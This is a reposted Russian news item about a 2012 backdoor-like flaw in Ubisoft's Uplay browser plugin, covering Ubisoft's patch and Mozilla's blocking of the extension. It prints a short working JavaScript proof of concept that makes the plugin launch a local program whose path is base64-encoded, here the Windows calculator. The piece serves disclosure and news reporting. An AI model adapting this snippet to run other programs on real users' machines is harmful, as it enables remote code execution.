- PVSM.RU - https://www.pvsm.ru -
В программе Uplay от компании Ubisoft вчера была обнаружена серьёзная уязвимость [1], которая представляет собой бэкдор на компьютеры миллионов пользователей, установивших игры от компании Ubisoft, такие как Assassin's Creed, Beowulf, Heroes of Might and Magic VI, Tom Clancy's Splinter Cell и прочие. Вместе с игрой на их компьютер установилась система Uplay DRM и расширение к браузеру.
Так вот, с помощью специального кода через это расширение можно получить доступ в систему пользователя с любого сайта.
Демо (в качестве примера запускает у вас на компьютере программу «Калькулятор») [2].
Код:
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Компания Ubisoft уверяет, что бэкдор не был специально встроен в систему, а это просто ошибка в коде. Они уже выпустили [3] обновлённую версию Uplay, которую можно скачать с официального сайта.
Но программа не обновляется автоматически и она установлена на миллионах компьютеров, для очень многих риск безопасности сохраняется. Поэтому Mozilla сегодня приняла решение полностью заблокировать расширение Uplay [4] для всех пользователей.
Автор: alizar
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/firefox-2/12353
Ссылки в тексте:
[1] серьёзная уязвимость: http://seclists.org/fulldisclosure/2012/Jul/375
[2] Демо (в качестве примера запускает у вас на компьютере программу «Калькулятор»): http://pastehtml.com/view/c6gxl1a79.html
[3] выпустили: http://www.rockpapershotgun.com/2012/07/30/ubisoft-respond-to-uplay-security-drama/
[4] полностью заблокировать расширение Uplay: https://addons.mozilla.org/en-US/firefox/blocked/p113
Нажмите здесь для печати.